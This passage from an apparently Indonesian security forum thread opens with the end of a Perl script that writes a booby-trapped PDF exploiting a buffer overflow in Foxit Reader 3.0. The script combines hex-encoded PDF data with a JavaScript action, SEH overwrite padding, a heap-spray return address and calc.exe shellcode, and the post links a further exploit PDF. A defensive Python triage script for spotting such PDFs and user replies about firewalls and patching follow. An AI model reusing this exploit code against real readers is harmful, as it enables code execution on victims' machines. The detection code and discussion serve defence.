    	        "\x3A\x79\xD1\xAF\xE2\xFE\x70\xCC\x36\xB3\xD9\x7A\x3A\xE9\x0E\xA7\x6C\xD1\x7F\xDA\x3F\x6F".
    	        "\xF2\xA2\x5C\xDB\xE6\xC3\xC6\xAD\xEF\xEE\x6C\xB7\x44\xDC\xEA\xED\xA7\xB3\x72\x95\xFB\xD7".
    	        "\xAA\x05\xA6\x93\xC7\x58\x1F\x9B\xDD\xA1\xFD\xAA\xDF\x5C\xE0\xC7\x6F\xB0\xDE\x35\xFD\xC3".
    	        "\x78\xF5\xF7\x9C\x63\x86\x6D\x3C\x9D\xFB\x1F\x51\xE3\x0A\xA7\x27\xE7\xE3\xA9\xFE\xAE\x7F".
    	        "\xAE\x37\xAB\x54\xE6\xFD\x2E\xEE\x1F\x9E\x1F\xA7\x93\xD7\xC7\x7E\x17\xB3\xC5\x58\xE3\xD7".
    	        "\xF9\x3D\xB0\xCB\x6C\x3C\x5E\x6D\xC6\x9D\x75\xDF\xEF\x76\x23\xA1\x84\x3B\x5F\x9A\xF3\xF3".
    	        "\xA9\xDF\x3F\x2C\xDC\xBB\x6C\x40\x1B\xF5\xFF\x86\xFD\x56\xF4\x2E\xC1\x40\x6A\x71\x7B\xB7".
    	        "\x1A\x9A\xB9\xCF\xDC\x37\x72\xFA\x53\x6A\x63\x6A\xF0\x1B\xD6\xC4\x4C\x73\x3C\xC5\x27\xD3".
    	        "\x32\xBE\x66\x1F\x4F\x0A\x5D\x2C\xD3\xDC\x74\x54\xFD\x7D\xAE\x69\xD6\xFD\x6A\xB5\xCC\x34".
    	        "\xF0\x73\xFF\x65\xCC\xA4\xCA\x27\x91\x14\xF1\x13\xE7\x6D\xDB\x93\x0D\x0A\x65\x6E\x64\x73".
    	        "\x74\x72\x65\x61\x6D\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x32\x36\x20\x30\x20\x6F\x62".
    	        "\x6A\x0D\x0A\x3C\x3C\x2F\x54\x79\x70\x65\x2F\x41\x63\x74\x69\x6F\x6E\x2F\x53\x2F\x4A\x61".
    	        "\x76\x61\x53\x63\x72\x69\x70\x74\x2F\x4A\x53\x20\x32\x37\x20\x30\x20\x52\x20\x3E\x3E\x0D".
    	        "\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x78\x72\x65\x66\x0D\x0A\x30\x20\x33\x31\x0D\x0A\x30".
    	        "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x20\x36\x35\x35\x33\x36\x20\x66\x0D\x0A\x30\x30\x30".
    	        "\x30\x30\x30\x30\x30\x31\x37\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30".
    	        "\x30\x30\x31\x39\x37\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x30".
    	        "\x33\x31\x34\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x30\x33\x33".
    	        "\x36\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x30\x34\x33\x32\x20".
    	        "\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x30\x34\x36\x38\x20\x30\x30".
    	        "\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x30\x35\x32\x32\x20\x30\x30\x30\x30".
    	        "\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x30\x36\x33\x33\x20\x30\x30\x30\x30\x30\x20".
    	        "\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x30\x38\x32\x37\x20\x30\x30\x30\x30\x30\x20\x6E\x0D".
    	        "\x0A\x30\x30\x30\x30\x30\x30\x31\x30\x39\x32\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30".
    	        "\x30\x30\x30\x30\x30\x31\x33\x31\x35\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30".
    	        "\x30\x30\x30\x31\x33\x37\x34\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30".
    	        "\x30\x31\x34\x34\x37\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x31".
    	        "\x35\x30\x30\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x31\x35\x39".
    	        "\x30\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x31\x36\x34\x39\x20".
    	        "\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x37\x31\x37\x31\x20\x30\x30".
    	        "\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x37\x32\x30\x36\x20\x30\x30\x30\x30".
    	        "\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x37\x33\x30\x36\x20\x30\x30\x30\x30\x30\x20".
    	        "\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x37\x33\x34\x30\x20\x30\x30\x30\x30\x30\x20\x6E\x0D".
    	        "\x0A\x30\x30\x30\x30\x30\x30\x37\x36\x33\x35\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30".
    	        "\x30\x30\x30\x30\x30\x37\x36\x37\x32\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30".
    	        "\x30\x30\x30\x37\x37\x31\x31\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30".
    	        "\x30\x38\x30\x35\x33\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x38".
    	        "\x33\x38\x39\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x39\x35\x31".
    	        "\x30\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x38\x36\x34\x31\x20".
    	        "\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x38\x35\x39\x38\x20\x30\x30".
    	        "\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x38\x35\x36\x30\x20\x30\x30\x30\x30".
    	        "\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x38\x35\x32\x30\x20\x30\x30\x30\x30\x30\x20".
    	        "\x6E\x0D\x0A\x74\x72\x61\x69\x6C\x65\x72\x0D\x0A\x3C\x3C\x2F\x52\x6F\x6F\x74\x20\x37\x20".
    	        "\x30\x20\x52\x20\x2F\x49\x6E\x66\x6F\x20\x38\x20\x30\x20\x52\x20\x2F\x49\x44\x5B\x28\xDF".
    	        "\xB0\x2B\xEC\xF3\x6B\xFA\x01\x9C\xBC\x4B\x06\x11\x7C\x78\x79\x29\x28\xDF\xB0\x2B\xEC\xF3".
    	        "\x6B\xFA\x01\x9C\xBC\x4B\x06\x11\x7C\x78\x79\x29\x5D\x2F\x44\x6F\x63\x43\x68\x65\x63\x6B".
    	        "\x73\x75\x6D\x2F\x37\x36\x33\x36\x30\x32\x39\x46\x42\x32\x42\x32\x46\x44\x32\x39\x42\x43".
    	        "\x33\x34\x41\x42\x43\x33\x32\x43\x46\x34\x35\x42\x38\x46\x2F\x53\x69\x7A\x65\x20\x33\x31".
    	        "\x3E\x3E\x0D\x0A\x73\x74\x61\x72\x74\x78\x72\x65\x66\x0D\x0A\x39\x35\x37\x30\x0D\x0A\x25".
    	        "\x25\x45\x4F\x46\x0D\x0A";
    #Now you cannot modify the shellcode in this Perl script but in the PDF's JavaScript.
    #The set shellcode is calc.exe shellcode (alpha2).
    my $overflow1 = "\x41" x 1346;
    my $overflow2 = "\x41" x 4096;
    my $sehjmp = "SkD"; # ;)
    my $sehret = "\x30\x30\x30\x30";     # 0x30303030 - heap sprayed block
    
    open (my $pdf, ">", "s.pdf") or die "Cannot open s.pdf: $!";
    binmode $pdf;
    print $pdf $pdf_data1.
               $overflow1.$sehjmp.$sehret.$overflow2.
               $pdf_data2;
    close $pdf or die "Cannot close s.pdf: $!";

    Run it with perl and a file s.pdf will be created; when it is opened with Foxit Reader 3.0 it can make an inbound connection (depending on the shellcode that was put in).


    or this bug:
    http://h1.ripway.com/07121985/bl4ck-...hell5500-2.pdf
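As an added defensive example (my own code, not the poster's script and not from any product named in the thread), a small static triage in Python that flags the PDF features this thread talks about: JavaScript actions, OpenAction/AA triggers, Launch actions and heap-spray-style JavaScript. The two PDF byte strings are constructed for the demo and are not valid documents; the `#61` name escape is included to show why names must be decoded before matching.

```python
import re

# Constructed sample: the shape of a PDF that carries a JavaScript OpenAction
# (with a "#61" name escape hiding "/JavaScript"), a heap-spray style script
# and a Launch action. Not a valid PDF; built only to exercise the checks.
SUSPICIOUS_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj\n<< /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >>\nendobj\n"
    b"3 0 obj\n<< /Type /Action /S /J#61vaScript /JS 4 0 R >>\nendobj\n"
    b"4 0 obj\n<< /Length 120 >>\nstream\n"
    b"var sled = unescape('%u9090%u9090%u9090%u9090');\n"
    b"var sc = unescape('%u4141%u4242%u4343%u4444');\n"
    b"while (sled.length < 0x40000) sled += sled;\n"
    b"endstream\nendobj\n"
    b"5 0 obj\n<< /Type /Action /S /Launch /F (calc.exe) >>\nendobj\n"
    b"%%EOF\n"
)

# Constructed benign sample: a catalog, one page and a plain text stream.
BENIGN_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj\n<< /Type /Catalog /Pages 2 0 R >>\nendobj\n"
    b"2 0 obj\n<< /Type /Pages /Kids [3 0 R] /Count 1 >>\nendobj\n"
    b"3 0 obj\n<< /Type /Page /Parent 2 0 R /Contents 4 0 R >>\nendobj\n"
    b"4 0 obj\n<< /Length 44 >>\nstream\nBT /F1 12 Tf (Hello) Tj ET\nendstream\nendobj\n"
    b"%%EOF\n"
)

# Names that let a document run code or start something when it is opened.
RISKY_NAMES = [b"/OpenAction", b"/AA", b"/JavaScript", b"/JS", b"/Launch"]

NAME_RE = re.compile(rb"/[^\s/\[\]<>(){}%]*")
NAME_ESCAPE_RE = re.compile(rb"#([0-9A-Fa-f]{2})")
U_GROUP_RE = re.compile(rb"%u[0-9A-Fa-f]{4}")
REPEATED_U_RE = re.compile(rb"(%u[0-9A-Fa-f]{4})\1{2,}")
SELF_APPEND_RE = re.compile(rb"\b(\w+)\s*\+=\s*\1\b")


def normalize_names(data: bytes) -> bytes:
    """Decode #xx escapes inside PDF names so /J#61vaScript reads as /JavaScript."""
    def unescape(match):
        return NAME_ESCAPE_RE.sub(lambda h: bytes([int(h.group(1), 16)]), match.group(0))
    return NAME_RE.sub(unescape, data)


def count_risky_names(data: bytes) -> dict:
    """Count whole-name occurrences of each risky name (so /JS does not match /JavaScript)."""
    counts = {}
    for name in RISKY_NAMES:
        pattern = re.compile(re.escape(name) + rb"(?![^\s/\[\]<>(){}%])")
        hits = len(pattern.findall(data))
        if hits:
            counts[name.decode()] = hits
    return counts


def heap_spray_indicators(data: bytes) -> list:
    """Flag the JavaScript patterns a heap spray needs: %u-encoded bytes passed to
    unescape(), a repeated padding block, and a string that doubles itself in a loop."""
    findings = []
    if b"unescape" in data and len(U_GROUP_RE.findall(data)) >= 4:
        findings.append("unescape() of %u-encoded data (shellcode or sled candidate)")
    if REPEATED_U_RE.search(data):
        findings.append("repeated %u block (NOP-sled style padding)")
    if SELF_APPEND_RE.search(data):
        findings.append("string self-append loop (spray growth)")
    return findings


def triage_pdf(data: bytes) -> dict:
    """Static triage of a PDF byte string; any finding marks it suspicious."""
    normalized = normalize_names(data)
    names = count_risky_names(normalized)
    spray = heap_spray_indicators(normalized)
    verdict = "suspicious" if names or spray else "clean"
    return {"risky_names": names, "heap_spray": spray, "verdict": verdict}


if __name__ == "__main__":
    for label, sample in (("suspicious", SUSPICIOUS_PDF), ("benign", BENIGN_PDF)):
        print(label, triage_pdf(sample))
```

The checks are deliberately coarse (no stream decompression, so FlateDecode'd JavaScript like the one in the script above would need inflating first); they are a triage filter to decide what to quarantine, not a replacement for patching the reader.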

  4. #3
    ditatompel's Avatar
    Join Date
    Apr 2008
    Location
    Semarang, Jogja, Surabaya... Sak karepku....
    Posts
    308
    Points
    402.20
    Thanks: 0 / 2 / 2


    Wow.... scary... the update is on 11 March?? So that's tomorrow??

  5. #4
    Black Zero's Avatar
    Join Date
    Jun 2008
    Location
    Jakarta
    Posts
    6,985
    Points
    7,682.70
    Thanks: 8 / 7 / 7


    Usually if there's a firewall it can block illegal outbound/inbound traffic. Just don't run it as administrator.

  6. #5

    Join Date
    May 2008
    Location
    /proc/sys/kernel/randomize_va_space
    Posts
    875
    Points
    1,326.90
    Thanks: 0 / 13 / 8


    Yep... a firewall is also enough if the .pdf tries to make a connection, but if the .pdf injects system files so they behave abnormally.. then it's the antivirus that has to do the job.. especially since this is playing with shellcode.. the instructions in the buffer can make system syscalls,.. like it or not, patch the reader so there's no buffer hole..

  7. #6
    Mizuchi's Avatar
    Join Date
    Sep 2008
    Posts
    259
    Points
    327.20
    Thanks: 0 / 0 / 0


    Whoa..
    how come PDF files have become this dangerous...
    is it still dangerous whether you use Adobe Reader or Foxit?
